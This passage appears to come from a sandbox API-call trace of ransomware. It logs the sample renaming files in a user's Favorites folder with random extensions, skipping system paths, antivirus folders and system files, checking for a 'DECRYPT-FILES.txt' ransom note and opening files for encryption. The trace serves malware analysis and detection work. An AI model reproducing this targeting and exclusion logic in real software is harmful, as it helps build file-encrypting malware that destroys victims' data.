lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.568] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.568] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.568] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.568] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.569] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.569] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.569] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.569] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.569] lstrlenA (lpString="DELETEATOM") returned 10 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.569] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.569] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.569] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.569] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.569] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.569] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.569] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.569] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.569] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.569] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.569] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.569] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.569] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.569] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.570] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.570] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.570] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.570] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.570] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.570] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.570] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.570] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.570] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.570] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.570] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.570] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.570] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.570] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.570] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.571] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.571] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.571] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.571] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.571] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.571] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.571] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.571] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.571] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.571] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.571] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.571] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.571] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.571] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.571] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1") returned 85 [0185.572] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1.Hl58hCJ") returned 93 [0185.572] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.5ycxy1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1.Hl58hCJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.5ycxy1.hl58hcj"), dwFlags=0x0) returned 1 [0185.572] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.573] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.573] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.573] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url.5yCxy1", cAlternateFileName="MICROS~1.5YC")) returned 0 [0185.573] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.573] CloseHandle (hObject=0x25c) returned 1 [0185.573] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaef2db20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaef2db20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0185.573] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0185.573] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0185.573] lstrcatW (in: lpString1="MSN Websites", lpString2="\\" | out: lpString1="MSN Websites\\") returned="MSN Websites\\" [0185.573] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Program Files") returned 0x0 [0185.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch=":\\Windows") returned 0x0 [0185.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Games\\") returned 0x0 [0185.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\All Users") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="AhnLab") returned 0x0 [0185.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.574] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.574] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\0a16c9.tmp") returned 64 [0185.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.576] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.576] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.576] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt") returned 71 [0185.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.576] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.576] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*" [0185.576] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf151b360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf151b360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.576] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf151b360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf151b360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.576] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.576] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.576] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf151b360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf151b360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf151b360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.576] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.576] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.576] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.576] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.576] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.577] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.577] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.577] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.577] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.577] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.577] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.577] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.577] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.577] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.577] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.577] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.577] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.577] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\0a16c9.tmp" [0185.577] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.577] CloseHandle (hObject=0x0) returned 0 [0185.577] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.578] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee955a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaee955a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.578] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.578] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url.X72ftxu", cAlternateFileName="MSNAUT~1.X72")) returned 1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="DECRYPT-FILES.txt") returned 1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="autorun.inf") returned 1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="boot.ini") returned 1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="desktop.ini") returned 1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="ntuser.dat") returned -1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="iconcache.db") returned 1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="bootsect.bak") returned 1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="ntuser.dat.log") returned -1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="thumbs.db") returned -1 [0185.578] lstrcmpiW (lpString1="MSN Autos.url.X72ftxu", lpString2="Bootfont.bin") returned 1 [0185.578] lstrlenW (lpString="MSN Autos.url.X72ftxu") returned 21 [0185.578] lstrcmpiW (lpString1="X72ftxu", lpString2="lnk") returned 1 [0185.578] lstrcmpiW (lpString1="X72ftxu", lpString2="exe") returned 1 [0185.578] lstrcmpiW (lpString1="X72ftxu", lpString2="sys") returned 1 [0185.578] lstrcmpiW (lpString1="X72ftxu", lpString2="dll") returned 1 [0185.578] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.578] lstrlenW (lpString="MSN Autos.url.X72ftxu") returned 21 [0185.578] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.578] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Autos.url.X72ftxu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu" [0185.578] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.x72ftxu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.579] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.579] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 